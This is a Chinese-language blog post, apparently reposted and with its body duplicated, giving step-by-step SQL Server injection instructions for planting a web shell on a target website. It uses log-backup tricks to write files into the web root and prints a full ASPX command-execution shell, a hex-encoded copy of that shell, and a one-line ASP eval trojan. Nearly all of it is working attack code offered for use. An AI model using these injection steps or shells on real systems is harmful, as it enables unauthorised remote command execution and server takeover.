Mssql 注入攻击,普通权限用户提权操作
2011-03-01 23:35
507 查看
如果该用户能够创建数据库的话
use master
go
create database book
go
use book
go
alter database book set RECOVERY FULL
go
create table cmd (a image)
go
backup database book to disk='c:bookdb.bak' with init
go
backup log book to disk='c:/book.bak' with init
go
insert into cmd (a) values('0x3C25402050616765204C616E67756167653D2243232220436F6E74656E74547970653D22746578742F68746D6C22202076616C6964617465526571756573743D2266616C73652220617370636F6D7061743D227472756522253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E494F2220253E0D0A3C254020696D706F7274206E616D6573706163653D2253797374656D2E446961676E6F73746963732220253E0D0A3C254020496D706F7274204E616D6573706163653D224D6963726F736F66742E57696E33322220253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E436F6C6C656374696F6E7322253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E4E657422253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E446174612E53716C436C69656E742220253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E546872656164696E672220253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E4E65742E536F636B65747322253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E446961676E6F737469637322253E0D0A3C666F726D2069643D2266726D33222072756E61743D22736572766572223E0D0A20202020202020203C6173703A4C6162656C2049443D224C62446F73222072756E61743D227365727665722220546578743D22444F5320436F6D6D616E643A223E3C2F6173703A4C6162656C3E0D0A20202020202020203C6173703A54657874426F782049443D2254657874426F78446F73222072756E61743D22736572766572222057696474683D223439397078223E6E657420757365723C2F6173703A54657874426F783E0D0A20202020202020203C6173703A427574746F6E2049443D22427574746F6E446F73222072756E61743D2273657276657222204F6E436C69636B3D22427574746F6E436D645F436C69636B2220546578743D22434D4422202F3E3C2F62723E0D0A20202020202020203C6173703A54657874426F782049443D2254657874426F78446F7343222072756E61743D2273657276657222204865696768743D223330307078222057696474683D2235373070782220426F726465725374796C653D22446F747465642220546578744D6F64653D224D756C74694C696E65223E3C2F6173703A54657874426F783E0D0A20202020202020203C2F666F726D3E0D0A3C7363726970742072756E61743D2273657276657222206C616E6775616E67653D224323223E0D0A20202020202020202020202070726F74656374656420766F696420427574746F6E436D645F436C69636B286F626A6563742073656E6465722C204576656E74417267732065290D0A2020202020202020202020207B0D0A2020202020202020202020202020202054657874426F78446F73432E54657874203D2022223B0D0A2020202020202020202020202020202050726F63657373206D7970726F63657373203D206E65772050726F6365737328293B0D0A2020202020202020202020202020202050726F636573735374617274496E666F204D7950726F636573735374617274496E666F203D206E65772050726F636573735374617274496E666F2822636D642E65786522293B0D0A202020202020202020202020202020204D7950726F636573735374617274496E666F2E5573655368656C6C45786563757465203D2066616C73653B0D0A202020202020202020202020202020204D7950726F636573735374617274496E666F2E52656469726563745374616E646172644F7574707574203D20747275653B0D0A202020202020202020202020202020206D7970726F636573732E5374617274496E666F203D204D7950726F636573735374617274496E666F3B0D0A202020202020202020202020202020204D7950726F636573735374617274496E666F2E417267756D656E7473203D20222F6322202B2054657874426F78446F732E546578743B0D0A202020202020202020202020202020206D7970726F636573732E537461727428293B0D0A2020202020202020202020202020202053747265616D526561646572206D7973747265616D203D206D7970726F636573732E5374616E646172644F75747075743B0D0A2020202020202020202020202020202054657874426F78446F73432E54657874203D206D7973747265616D2E52656164546F456E6428293B0D0A202020202020202020202020202020206D7973747265616D2E436C6F736528293B0D0A2020202020202020202020207D0D0A2020202020202020202020203C2F7363726970743E')
go
backup log book to disk='c:/book.aspx' with init
go
use master
go
drop database book
go
上面的方法可以用来生成对应的aspx页面上运行对应的dos命令
如果不能的话,就可以利用上面的方法,使用已有的数据库进行操作,也是可以正常运行dos命令的,但是会出现乱码字符造成代码不能正常运行
在IE里把DB注入点粘贴上,如http://www.xxxx.com/xxxx.asp?flowNo=1 alter database sq_xxxx set RECOVERY FULL
下面是几个完整的步骤
1.InjectionURL’;alter database sq_huaweitoys set RECOVERY FULL– (把sql设置成日志完全恢复模式)
2.InjectionURL’;create table cmd (a image)– (新建立一个cmd表)
3.InjectionURL’;backup log sq_huaweitoys to disk = ‘c:/cmd’ with init– (减少备分数据的大小)
4.InjectionURL’;insert into cmd (a) values (’<%%25eval(request("a")):response.end%%25>‘)– (插入一句话木马)
5.InjectionURL’;backup log sq_xxxx to disk = ‘D:/wwwroot/xxxx/wwwroot/hxhack.asp’– (备分日志到WEB路径)
6.InjectionURL’;drop table cmd– (删除新建的cmd表)
7.InjectionURL’;alter database sq_xxxx set RECOVERY SIMPLE–(把sql设置成日志简单恢复模式)
<%@ Page Language="C#" ContentType="text/html" validateRequest="false" aspcompat="true"%>
<%@ import namespace="System.Diagnostics" %>
<%@ Import Namespace="Microsoft.Win32" %>
<%@ Import Namespace="System.Collections"%>
<%@ Import Namespace="System.Diagnostics"%>
<script runat="server">
protected void ButtonCmd_Click(object sender, EventArgs e)
{
TextBoxDosC.Text = "";
Process myprocess = new Process();
ProcessStartInfo MyProcessStartInfo = new ProcessStartInfo("cmd.exe");
MyProcessStartInfo.UseShellExecute = false;
MyProcessStartInfo.RedirectStandardOutput = true;
myprocess.StartInfo = MyProcessStartInfo;
MyProcessStartInfo.Arguments = "/c" + TextBoxDos.Text;
myprocess.Start();
StreamReader mystream = myprocess.StandardOutput;
TextBoxDosC.Text = mystream.ReadToEnd();
mystream.Close();
}
</script>
<form id="frm3" runat="server">
<asp:Label ID="LbDos" runat="server" Text="DOS Command:"></asp:Label>
<asp:TextBox ID="TextBoxDos" runat="server" Width="499px">net user</asp:TextBox>
<asp:Button ID="ButtonDos" runat="server" OnClick="ButtonCmd_Click" Text="CMD" /></br>
<asp:TextBox ID="TextBoxDosC" runat="server" Height="300px" Width="570px" BorderStyle="Dotted" TextMode="MultiLine"></asp:TextBox>
</form>
use master
go
create database book
go
use book
go
alter database book set RECOVERY FULL
go
create table cmd (a image)
go
backup database book to disk='c:bookdb.bak' with init
go
backup log book to disk='c:/book.bak' with init
go
insert into cmd (a) values('0x3C25402050616765204C616E67756167653D2243232220436F6E74656E74547970653D22746578742F68746D6C22202076616C6964617465526571756573743D2266616C73652220617370636F6D7061743D227472756522253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E494F2220253E0D0A3C254020696D706F7274206E616D6573706163653D2253797374656D2E446961676E6F73746963732220253E0D0A3C254020496D706F7274204E616D6573706163653D224D6963726F736F66742E57696E33322220253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E436F6C6C656374696F6E7322253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E4E657422253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E446174612E53716C436C69656E742220253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E546872656164696E672220253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E4E65742E536F636B65747322253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E446961676E6F737469637322253E0D0A3C666F726D2069643D2266726D33222072756E61743D22736572766572223E0D0A20202020202020203C6173703A4C6162656C2049443D224C62446F73222072756E61743D227365727665722220546578743D22444F5320436F6D6D616E643A223E3C2F6173703A4C6162656C3E0D0A20202020202020203C6173703A54657874426F782049443D2254657874426F78446F73222072756E61743D22736572766572222057696474683D223439397078223E6E657420757365723C2F6173703A54657874426F783E0D0A20202020202020203C6173703A427574746F6E2049443D22427574746F6E446F73222072756E61743D2273657276657222204F6E436C69636B3D22427574746F6E436D645F436C69636B2220546578743D22434D4422202F3E3C2F62723E0D0A20202020202020203C6173703A54657874426F782049443D2254657874426F78446F7343222072756E61743D2273657276657222204865696768743D223330307078222057696474683D2235373070782220426F726465725374796C653D22446F747465642220546578744D6F64653D224D756C74694C696E65223E3C2F6173703A54657874426F783E0D0A20202020202020203C2F666F726D3E0D0A3C7363726970742072756E61743D2273657276657222206C616E6775616E67653D224323223E0D0A20202020202020202020202070726F74656374656420766F696420427574746F6E436D645F436C69636B286F626A6563742073656E6465722C204576656E74417267732065290D0A2020202020202020202020207B0D0A2020202020202020202020202020202054657874426F78446F73432E54657874203D2022223B0D0A2020202020202020202020202020202050726F63657373206D7970726F63657373203D206E65772050726F6365737328293B0D0A2020202020202020202020202020202050726F636573735374617274496E666F204D7950726F636573735374617274496E666F203D206E65772050726F636573735374617274496E666F2822636D642E65786522293B0D0A202020202020202020202020202020204D7950726F636573735374617274496E666F2E5573655368656C6C45786563757465203D2066616C73653B0D0A202020202020202020202020202020204D7950726F636573735374617274496E666F2E52656469726563745374616E646172644F7574707574203D20747275653B0D0A202020202020202020202020202020206D7970726F636573732E5374617274496E666F203D204D7950726F636573735374617274496E666F3B0D0A202020202020202020202020202020204D7950726F636573735374617274496E666F2E417267756D656E7473203D20222F6322202B2054657874426F78446F732E546578743B0D0A202020202020202020202020202020206D7970726F636573732E537461727428293B0D0A2020202020202020202020202020202053747265616D526561646572206D7973747265616D203D206D7970726F636573732E5374616E646172644F75747075743B0D0A2020202020202020202020202020202054657874426F78446F73432E54657874203D206D7973747265616D2E52656164546F456E6428293B0D0A202020202020202020202020202020206D7973747265616D2E436C6F736528293B0D0A2020202020202020202020207D0D0A2020202020202020202020203C2F7363726970743E')
go
backup log book to disk='c:/book.aspx' with init
go
use master
go
drop database book
go
上面的方法可以用来生成对应的aspx页面上运行对应的dos命令
如果不能的话,就可以利用上面的方法,使用已有的数据库进行操作,也是可以正常运行dos命令的,但是会出现乱码字符造成代码不能正常运行
在IE里把DB注入点粘贴上,如http://www.xxxx.com/xxxx.asp?flowNo=1 alter database sq_xxxx set RECOVERY FULL
下面是几个完整的步骤
1.InjectionURL’;alter database sq_huaweitoys set RECOVERY FULL– (把sql设置成日志完全恢复模式)
2.InjectionURL’;create table cmd (a image)– (新建立一个cmd表)
3.InjectionURL’;backup log sq_huaweitoys to disk = ‘c:/cmd’ with init– (减少备分数据的大小)
4.InjectionURL’;insert into cmd (a) values (’<%%25eval(request("a")):response.end%%25>‘)– (插入一句话木马)
5.InjectionURL’;backup log sq_xxxx to disk = ‘D:/wwwroot/xxxx/wwwroot/hxhack.asp’– (备分日志到WEB路径)
6.InjectionURL’;drop table cmd– (删除新建的cmd表)
7.InjectionURL’;alter database sq_xxxx set RECOVERY SIMPLE–(把sql设置成日志简单恢复模式)
<%@ Page Language="C#" ContentType="text/html" validateRequest="false" aspcompat="true"%>
<%@ import namespace="System.Diagnostics" %>
<%@ Import Namespace="Microsoft.Win32" %>
<%@ Import Namespace="System.Collections"%>
<%@ Import Namespace="System.Diagnostics"%>
<script runat="server">
protected void ButtonCmd_Click(object sender, EventArgs e)
{
TextBoxDosC.Text = "";
Process myprocess = new Process();
ProcessStartInfo MyProcessStartInfo = new ProcessStartInfo("cmd.exe");
MyProcessStartInfo.UseShellExecute = false;
MyProcessStartInfo.RedirectStandardOutput = true;
myprocess.StartInfo = MyProcessStartInfo;
MyProcessStartInfo.Arguments = "/c" + TextBoxDos.Text;
myprocess.Start();
StreamReader mystream = myprocess.StandardOutput;
TextBoxDosC.Text = mystream.ReadToEnd();
mystream.Close();
}
</script>
<form id="frm3" runat="server">
<asp:Label ID="LbDos" runat="server" Text="DOS Command:"></asp:Label>
<asp:TextBox ID="TextBoxDos" runat="server" Width="499px">net user</asp:TextBox>
<asp:Button ID="ButtonDos" runat="server" OnClick="ButtonCmd_Click" Text="CMD" /></br>
<asp:TextBox ID="TextBoxDosC" runat="server" Height="300px" Width="570px" BorderStyle="Dotted" TextMode="MultiLine"></asp:TextBox>
</form>
相关文章推荐
- 普通用户的注册和管理员的权限操作
- centos添加普通用户,操作权限设置
- CentOS学习5_为CentOS普通用户增加sudo操作权限
- centos添加普通用户,操作权限设置
- MSSQL 创建用户和权限简单操作
- Ubuntu下关于将普通用户权限提升为root的问题
- 用户权限 及操作
- 赋予普通用户sudo的权限方法
- 虚拟主机用户ftp和apache用户文件互操作权限解决方法
- Linux 虚拟机 给用户 赋某个文件夹操作的权限
- mysql5.7.19用户的创建和权限的操作
- 多用户分权限操作同一工作表(转帖+亲自实践)
- Oracle总结第二篇【视图、索引、事务、用户权限、批量操作】
- oracle 10g 为新建用户并赋予所有表操作权限的方法
- Ubuntu16.04 ext4格式硬盘挂载普通用户权限控制的操作方法
- Win7普通用户下提升注册表权限
- 单用户多角色权限的MSSQL实现
- 赋予普通用户sudo权限
- hadoop 创建用户及hdfs权限,hdfs操作等常用shell命令
- SQL2000数据库”运行在普通用户下所需的权限